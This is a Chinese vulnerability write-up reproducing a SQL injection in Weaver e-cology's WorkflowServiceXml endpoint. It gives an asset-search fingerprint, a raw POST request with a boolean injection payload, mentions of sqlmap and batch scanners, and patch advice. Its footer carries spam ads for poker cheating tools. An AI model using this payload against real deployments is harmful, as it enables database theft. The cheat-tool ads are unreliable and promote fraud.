【漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞
创始人
2025-01-08 03:34:21
0

0x01 产品简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

泛微OAE-Cology 接口/services/WorkflowServiceXml 存在SQL注入漏洞,可获取数据库权限,导致数据泄露。

0x03 搜索引擎

app="泛微-OA(e-cology)" 

在这里插入图片描述

0x04 漏洞复现

POST /services/WorkflowServiceXml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Content-Type: text/xml Accept-Encoding: gzip Content-Length: 487                      1         1         1         1                      1=1 AND 5615=5615                     

在这里插入图片描述
sqlmap验证

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、官方已发布升级补丁包,支持在线升级和离线补丁安装
https://www.weaver.com.cn/cs/securityDownload.html?src=cn

2、临时解决方案
使用WAF等安全设备进行防护。
在不影响业务的情况下配置URL访问控制策略。
限制访问来源地址,如非必要,不要将系统开放在互联网上。

相关内容

热门资讯

安装程序教程!aapoker可... 安装程序教程!aapoker可以开挂吗(黑科技)外挂黑科技ai辅助app(有挂总结)-哔哩哔哩1、a...
黑科技ai!云扑克德州辅助器(... 黑科技ai!云扑克德州辅助器(wepoke有没有挂)本来是真的有挂(有挂教学)-哔哩哔哩;无聊就玩这...
黑科技攻略!wpk使用ai辅助... 黑科技攻略!wpk使用ai辅助会封号吗(透视)揭秘攻略(2020已更新)(哔哩哔哩)暗藏猫腻,小编详...
黑科技真的(德州之星辅助器)外... 黑科技真的(德州之星辅助器)外挂透明挂辅助工具(透视)总是是有挂(有挂详细)-哔哩哔哩1、进入到德州...
我来教大家!红龙扑克是真正规的... 我来教大家!红龙扑克是真正规的吗(黑科技)外挂ai辅助辅助黑科技(有挂规律)-哔哩哔哩;小薇(透视辅...
黑科技教学!wpkai透视外挂... 黑科技教学!wpkai透视外挂售卖(aapoker辅助工具ai)素来是真的有挂(有挂细节)-哔哩哔哩...
黑科技ai(扑克时间可以控制吗... 黑科技ai(扑克时间可以控制吗)外挂透明挂辅助插件(透视)都是有挂(有挂透视)-哔哩哔哩1、金币登录...
黑科技计算!微扑克ai分析(透... 黑科技计算!微扑克ai分析(透视)安装教程(2025已更新)(哔哩哔哩);在进入微扑克ai分析辅助挂...
实测教程!AApoker辅助工... 实测教程!AApoker辅助工具(黑科技)外挂ai辅助辅助工具(有挂攻略)-哔哩哔哩1)AApoke...
黑科技挂!德扑之星软件辅牌器(... 自定义wepoke有没有挂系统规律,只需要输入自己想要的开挂功能,一键便可以生成出微扑克专用辅助器,...